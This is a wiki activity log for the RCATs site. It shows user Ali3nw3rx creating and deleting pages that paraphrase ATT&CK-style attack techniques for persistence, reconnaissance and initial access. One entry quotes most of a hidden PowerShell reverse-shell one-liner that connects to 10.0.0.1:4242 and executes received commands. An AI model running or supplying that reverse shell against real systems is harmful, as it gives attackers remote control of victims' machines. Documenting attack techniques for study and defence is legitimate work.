All public logs

Combined display of all available logs of RCATs. You can narrow down the view by selecting a log type, the username (case-sensitive), or the affected page (also case-sensitive).

Logs
(newest | oldest) View ( | ) (20 | 50 | 100 | 250 | 500)
  • 12:53, 28 January 2023 Ali3nw3rx talk contribs deleted page Category:Server Software Component (Mass deletion of pages added by Ali3nw3rx)
  • 12:52, 28 January 2023 Ali3nw3rx talk contribs deleted page Category:Boot or Logon Initialization Scripts (Mass deletion of pages added by Ali3nw3rx)
  • 12:22, 28 January 2023 Ali3nw3rx talk contribs deleted page Category:System Services (content was: "Adversaries may abuse system services or daemons to execute commands or programs. Adversaries can execute malicious content by interacting with or creating services either locally or remotely. Many services are set to run at boot, which can aid in achieving persistence (Create or Modify System Process), but adversaries can also abuse services for one-time or temporary ex...", and the only contributor was "Ali3nw3rx" (talk))
  • 12:22, 28 January 2023 Ali3nw3rx talk contribs deleted page Category:Inter-Process Communication (content was: "Adversaries may abuse inter-process communication (IPC) mechanisms for local code or command execution. IPC is typically used by processes to share data, communicate with each other, or synchronize execution. IPC is also commonly used to avoid situations such as deadlocks, which occurs when processes are stuck in a cyclic waiting pattern. Adversaries may abuse IPC to ex...", and the only contributor was "Ali3nw3rx" (talk))
  • 12:22, 28 January 2023 Ali3nw3rx talk contribs deleted page Category:Command and Scripting Interpreter (content was: "Adversaries may abuse command and script interpreters to execute commands, scripts, or binaries. These interfaces and languages provide ways of interacting with computer systems and are a common feature across many different platforms. Most systems come with some built-in command-line interface and scripting capabilities, for example, macOS and Linux distributions includ...", and the only contributor was "Ali3nw3rx" (talk))
  • 12:17, 28 January 2023 Ali3nw3rx talk contribs deleted page Trusted Relationship (content was: "Category:Initial Access", and the only contributor was "SourMilk" (talk))
  • 12:17, 28 January 2023 Ali3nw3rx talk contribs deleted page Replication Through Removable Media (content was: "Category:Initial Access", and the only contributor was "SourMilk" (talk))
  • 12:17, 28 January 2023 Ali3nw3rx talk contribs deleted page Hardware Additions (content was: "Category:Initial Access", and the only contributor was "SourMilk" (talk))
  • 12:17, 28 January 2023 Ali3nw3rx talk contribs deleted page External Remote Services (content was: "Adversaries may leverage external-facing remote services to initially access and/or persist within a network. Remote services such as VPNs, Citrix, and other access mechanisms allow users to connect to internal enterprise network resources from external locations. There are often remote service gateways that manage connections and credential authentication for these services. Services such as Windows Remote Management and VNC can also be used externally.[1] Access to Valid Acc...")
  • 12:16, 28 January 2023 Ali3nw3rx talk contribs deleted page Exploit Public-Facing Application (content was: "Category:Initial Access", and the only contributor was "SourMilk" (talk))
  • 12:15, 28 January 2023 Ali3nw3rx talk contribs deleted page Drive-by Compromise (content was: "Category:Initial Access", and the only contributor was "SourMilk" (talk))
  • 12:15, 28 January 2023 Ali3nw3rx talk contribs deleted page Category:Valid Accounts (content was: "Adversaries may obtain and abuse credentials of existing accounts as a means of gaining Initial Access, Persistence, Privilege Escalation, or Defense Evasion. Compromised credentials may be used to bypass access controls placed on various resources on systems within the network and may even be used for persistent access to remote systems and externally available services, such as VPNs, Outlook Web Access, network devices, and remote desktop.[1] Compromised credentials may also...")
  • 12:15, 28 January 2023 Ali3nw3rx talk contribs deleted page Category:Phishing (content was: "Category:Initial Access", and the only contributor was "SourMilk" (talk))
  • 12:14, 28 January 2023 Ali3nw3rx talk contribs deleted page Category:Supply Chain Compromise (content was: "Category:Initial Access", and the only contributor was "SourMilk" (talk))
  • 12:14, 28 January 2023 Ali3nw3rx talk contribs deleted page Compromise Infrastructure (content was: "Adversaries may compromise third-party infrastructure that can be used during targeting. Infrastructure solutions include physical or cloud servers, domains, and third-party web and DNS services. Instead of buying, leasing, or renting infrastructure an adversary may compromise infrastructure and use it during other phases of the adversary lifecycle.[1][2][3][4] Additiona...", and the only contributor was "Ali3nw3rx" (talk))
  • 12:14, 28 January 2023 Ali3nw3rx talk contribs deleted page Category:Compromise Accounts (content was: "Adversaries may compromise accounts with services that can be used during targeting. For operations incorporating social engineering, the utilization of an online persona may be important. Rather than creating and cultivating accounts (i.e. Establish Accounts), adversaries may compromise existing accounts. Utilizing an existing persona may engender a level of trust in a...", and the only contributor was "Ali3nw3rx" (talk))
  • 12:12, 28 January 2023 Ali3nw3rx talk contribs deleted page Category:Victim Org Information (content was: "Attackers may collect information about the victim organization that can be used to identify potential targets. This information can include details about different divisions/departments, business operations, and key employees' roles and responsibilities. They may collect this information through various methods such as directly requesting it via phishing emails. The inf...", and the only contributor was "Ali3nw3rx" (talk))
  • 12:12, 28 January 2023 Ali3nw3rx talk contribs deleted page Category:Victim Network Information (content was: "Adversaries may gather information about the victim's networks that can be used during targeting. Information about networks may include a variety of details, including administrative data (ex: IP ranges, domain names, etc.) as well as specifics regarding its topology and operations. Adversaries may gather this information in various ways, such as direct collection acti...", and the only contributor was "Ali3nw3rx" (talk))
  • 12:11, 28 January 2023 Ali3nw3rx talk contribs deleted page Category:Victim Identity Information (content was: "Adversaries may gather information about the victim's identity that can be used during targeting. Information about identities may include a variety of details, including personal data (ex: employee names, email addresses, etc.) as well as sensitive details such as credentials. Adversaries may gather this information in various ways, such as direct elicitation via Phish...", and the only contributor was "Ali3nw3rx" (talk))
  • 12:11, 28 January 2023 Ali3nw3rx talk contribs deleted page Category:Victim Host Information (content was: "Adversaries may gather information about the victim's hosts that can be used during targeting. Information about hosts may include a variety of details, including administrative data (ex: name, assigned IP, functionality, etc.) as well as specifics regarding its configuration (ex: operating system, language, etc.). Adversaries may gather this information in various ways...", and the only contributor was "Ali3nw3rx" (talk))
  • 12:11, 28 January 2023 Ali3nw3rx talk contribs deleted page Category:Search Victim-Owned Websites (content was: "Adversaries may search websites owned by the victim for information that can be used during targeting. Victim-owned websites may contain a variety of details, including names of departments/divisions, physical locations, and data about key employees such as names, roles, and contact info (ex: Email Addresses). These sites may also have details highlighting business operations and relationships.[1] Adversaries may search victim-owned websites to gather actionable informati...")
  • 12:11, 28 January 2023 Ali3nw3rx talk contribs deleted page Category:Search Open Websites/Domains (content was: "Adversaries may search freely available websites and/or domains for information about victims that can be used during targeting. Information about victims may be available in various online sites, such as social media, new sites, or those hosting information about business operations such as hiring or requested/rewarded contracts.[1][2][3] Adversaries may search in diff...", and the only contributor was "Ali3nw3rx" (talk))
  • 12:10, 28 January 2023 Ali3nw3rx talk contribs deleted page Category:Search Open Technical Databases (content was: "Adversaries may search freely available technical databases for information about victims that can be used during targeting. Information about victims may be available in online databases and repositories, such as registrations of domains/certificates as well as public collections of network data/artifacts gathered from traffic and/or scans.[1][2][3][4][5][6][7] Adversa...", and the only contributor was "Ali3nw3rx" (talk))
  • 12:10, 28 January 2023 Ali3nw3rx talk contribs deleted page Category:Search Closed Sources (content was: "Adversaries may gather information about victims from private, closed sources that can be used to identify potential targets. This information may be available for purchase from reputable sources such as paid subscriptions to feeds of technical/threat intelligence data, or from less reputable sources such as dark web or cybercrime black markets. They may search different...", and the only contributor was "Ali3nw3rx" (talk))
  • 12:00, 28 January 2023 Ali3nw3rx talk contribs created page Ping (Created page with "Category:Active Scanning ==Description== Adversaries may scan victim IP blocks to gather information that can be used during targeting. Public IP addresses may be allocated to organizations by block, or a range of sequential addresses. Adversaries may scan IP blocks in order to Gather Victim Network Information, such as which IP addresses are actively in use as well as more detailed information about hosts assigned these addresses. Scans may range from simple pings...")
  • 11:33, 28 January 2023 Ali3nw3rx talk contribs created page User:Ali3nw3rx (Created page with "thumb")
  • 11:31, 28 January 2023 Ali3nw3rx talk contribs uploaded File:Gaming-logo-maker-featuring-robotic-animal-graphics-1028-el1 (3).png
  • 11:31, 28 January 2023 Ali3nw3rx talk contribs created page File:Gaming-logo-maker-featuring-robotic-animal-graphics-1028-el1 (3).png
  • 11:15, 28 January 2023 Ali3nw3rx talk contribs created page Powershell Reverse Shell (Created page with " ==Powershell Reverse Shells== <syntaxhighlight lang="powershell"> powershell -NoP -NonI -W Hidden -Exec Bypass -Command New-Object System.Net.Sockets.TCPClient("10.0.0.1",4242);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + "PS " + (pwd).Path + "> ";...") Tag: Visual edit
  • 18:47, 26 January 2023 Ali3nw3rx talk contribs created page Template:Test page (Created page with "== This is our test page == == section 1 == === code we want to grab === == section 2 == === more code to grab === <syntaxhighlight> some random code </syntaxhighlight>")
  • 18:23, 26 January 2023 Ali3nw3rx talk contribs created page Test cheat sheet (Created page with "enumeration")
  • 18:00, 26 January 2023 Ali3nw3rx talk contribs created page Terminal Services DLL (Created page with "Adversaries may abuse components of Terminal Services to enable persistent access to systems. Microsoft Terminal Services, renamed to Remote Desktop Services in some Windows Server OSs as of 2022, enable remote terminal connections to hosts. Terminal Services allows servers to transmit a full, interactive, graphical user interface to clients via RDP.[1] Windows Services that are run as a "generic" process (ex: svchost.exe) load the service's DLL file, the location of wh...")
  • 17:59, 26 January 2023 Ali3nw3rx talk contribs created page IIS Components (Created page with "Adversaries may install malicious components that run on Internet Information Services (IIS) web servers to establish persistence. IIS provides several mechanisms to extend the functionality of the web servers. For example, Internet Server Application Programming Interface (ISAPI) extensions and filters can be installed to examine and/or modify incoming and outgoing IIS web requests. Extensions and filters are deployed as DLL files that export three functions: Get{Extens...")
  • 17:55, 26 January 2023 Ali3nw3rx talk contribs created page Web Shell (Created page with "Adversaries may backdoor web servers with web shells to establish persistent access to systems. A Web shell is a Web script that is placed on an openly accessible Web server to allow an adversary to use the Web server as a gateway into a network. A Web shell may provide a set of functions to execute or a command-line interface on the system that hosts the Web server.[1] In addition to a server-side script, a Web shell may have a client interface program that is used to...")
  • 17:54, 26 January 2023 Ali3nw3rx talk contribs created page Transport Agent (Created page with "Adversaries may abuse Microsoft transport agents to establish persistent access to systems. Microsoft Exchange transport agents can operate on email messages passing through the transport pipeline to perform various tasks such as filtering spam, filtering malicious attachments, journaling, or adding a corporate signature to the end of all outgoing emails.[1][2] Transport agents can be written by application developers and then compiled to .NET assemblies that are subsequ...")
  • 17:54, 26 January 2023 Ali3nw3rx talk contribs created page SQL Stored Procedures (Created page with "Adversaries may abuse SQL stored procedures to establish persistent access to systems. SQL Stored Procedures are code that can be saved and reused so that database users do not waste time rewriting frequently used SQL queries. Stored procedures can be invoked via SQL statements to the database using the procedure name or via defined events (e.g. when a SQL server application is started/restarted). Adversaries may craft malicious stored procedures that can provide a pers...")
  • 17:53, 26 January 2023 Ali3nw3rx talk contribs created page Category:Server Software Component (Created page with "Adversaries may abuse legitimate extensible development features of servers to establish persistent access to systems. Enterprise server applications may include features that allow developers to write and install software or scripts to extend the functionality of the main application. Adversaries may install malicious components to extend and abuse server applications.[1] category: persistence")
  • 17:50, 26 January 2023 Ali3nw3rx talk contribs created page TFTP Boot (Created page with "Adversaries may abuse netbooting to load an unauthorized network device operating system from a Trivial File Transfer Protocol (TFTP) server. TFTP boot (netbooting) is commonly used by network administrators to load configuration-controlled network device images from a centralized management server. Netbooting is one option in the boot sequence and can be used to centralize, manage, and control device images. Adversaries may manipulate the configuration on the network d...")
  • 17:49, 26 January 2023 Ali3nw3rx talk contribs created page ROMMONkit (Created page with "Adversaries may abuse the ROM Monitor (ROMMON) by loading an unauthorized firmware with adversary code to provide persistent access and manipulate device behavior that is difficult to detect. [1][2] ROMMON is a Cisco network device firmware that functions as a boot loader, boot image, or boot helper to initialize hardware and software when the platform is powered on or reset. Similar to TFTP Boot, an adversary may upgrade the ROMMON image locally or remotely (for exampl...")
  • 17:49, 26 January 2023 Ali3nw3rx talk contribs created page Bootkit (Created page with "Adversaries may use bootkits to persist on systems. Bootkits reside at a layer below the operating system and may make it difficult to perform full remediation unless an organization suspects one was used and can act accordingly. A bootkit is a malware variant that modifies the boot sectors of a hard drive, including the Master Boot Record (MBR) and Volume Boot Record (VBR). [1] The MBR is the section of disk that is first loaded after completing hardware initialization...")
  • 17:48, 26 January 2023 Ali3nw3rx talk contribs created page Component Firmware (Created page with "Adversaries may modify component firmware to persist on systems. Some adversaries may employ sophisticated means to compromise computer components and install malicious firmware that will execute adversary code outside of the operating system and main system firmware or BIOS. This technique may be similar to System Firmware but conducted upon other system components/devices that may not have the same capability or level of integrity checking. Malicious component firmwar...")
  • 17:48, 26 January 2023 Ali3nw3rx talk contribs created page System Firmware (Created page with "Adversaries may modify system firmware to persist on systems.The BIOS (Basic Input/Output System) and The Unified Extensible Firmware Interface (UEFI) or Extensible Firmware Interface (EFI) are examples of system firmware that operate as the software interface between the operating system and hardware of a computer. [1] [2] [3] System firmware like BIOS and (U)EFI underly the functionality of a computer and may be modified by an adversary to perform or assist in malicio...")
  • 17:47, 26 January 2023 Ali3nw3rx talk contribs created page Category:Pre-OS Boot (Created page with "Adversaries may abuse Pre-OS Boot mechanisms as a way to establish persistence on a system. During the booting process of a computer, firmware and various startup services are loaded before the operating system. These programs control flow of execution before the operating system takes control.[1] Adversaries may overwrite data in boot drivers or firmware such as BIOS (Basic Input/Output System) and The Unified Extensible Firmware Interface (UEFI) to persist on systems...")
  • 17:47, 26 January 2023 Ali3nw3rx talk contribs deleted page Pre-OS Boot (content was: "Adversaries may abuse Pre-OS Boot mechanisms as a way to establish persistence on a system. During the booting process of a computer, firmware and various startup services are loaded before the operating system. These programs control flow of execution before the operating system takes control.[1] Adversaries may overwrite data in boot drivers or firmware such as BIOS (...", and the only contributor was "Ali3nw3rx" (talk))
  • 17:47, 26 January 2023 Ali3nw3rx talk contribs created page Pre-OS Boot (Created page with "Adversaries may abuse Pre-OS Boot mechanisms as a way to establish persistence on a system. During the booting process of a computer, firmware and various startup services are loaded before the operating system. These programs control flow of execution before the operating system takes control.[1] Adversaries may overwrite data in boot drivers or firmware such as BIOS (Basic Input/Output System) and The Unified Extensible Firmware Interface (UEFI) to persist on systems...")
  • 17:45, 26 January 2023 Ali3nw3rx talk contribs created page Add-ins (Created page with "Adversaries may abuse Microsoft Office add-ins to obtain persistence on a compromised system. Office add-ins can be used to add functionality to Office programs. [1] There are different types of add-ins that can be used by the various Office products; including Word/Excel add-in Libraries (WLL/XLL), VBA add-ins, Office Component Object Model (COM) add-ins, automation add-ins, VBA Editor (VBE), Visual Studio Tools for Office (VSTO) add-ins, and Outlook add-ins. [2][3] Ad...")
  • 17:44, 26 January 2023 Ali3nw3rx talk contribs created page Outlook Rules (Created page with "Adversaries may abuse Microsoft Outlook rules to obtain persistence on a compromised system. Outlook rules allow a user to define automated behavior to manage email messages. A benign rule might, for example, automatically move an email to a particular folder in Outlook if it contains specific words from a specific sender. Malicious Outlook rules can be created that can trigger code execution when an adversary sends a specifically crafted email to that user.[1] Once mal...")
  • 17:44, 26 January 2023 Ali3nw3rx talk contribs created page Outlook Home Page (Created page with "Adversaries may abuse Microsoft Outlook's Home Page feature to obtain persistence on a compromised system. Outlook Home Page is a legacy feature used to customize the presentation of Outlook folders. This feature allows for an internal or external URL to be loaded and presented whenever a folder is opened. A malicious HTML page can be crafted that will execute code when loaded by Outlook Home Page.[1] Once malicious home pages have been added to the user’s mailbox, th...")
  • 17:43, 26 January 2023 Ali3nw3rx talk contribs created page Outlook Forms (Created page with "Adversaries may abuse Microsoft Outlook forms to obtain persistence on a compromised system. Outlook forms are used as templates for presentation and functionality in Outlook messages. Custom Outlook forms can be created that will execute code when a specifically crafted email is sent by an adversary utilizing the same custom Outlook form.[1] Once malicious forms have been added to the user’s mailbox, they will be loaded when Outlook is started. Malicious forms will e...")
  • 17:43, 26 January 2023 Ali3nw3rx talk contribs created page Office Test (Created page with "Adversaries may abuse the Microsoft Office "Office Test" Registry key to obtain persistence on a compromised system. An Office Test Registry location exists that allows a user to specify an arbitrary DLL that will be executed every time an Office application is started. This Registry key is thought to be used by Microsoft to load DLLs for testing and debugging purposes while developing Office applications. This Registry key is not created by default during an Office inst...")
(newest | oldest) View ( | ) (20 | 50 | 100 | 250 | 500)
Retrieved from "https://rcats.dev/rcats/index.php/Special:Log/Ali3nw3rx"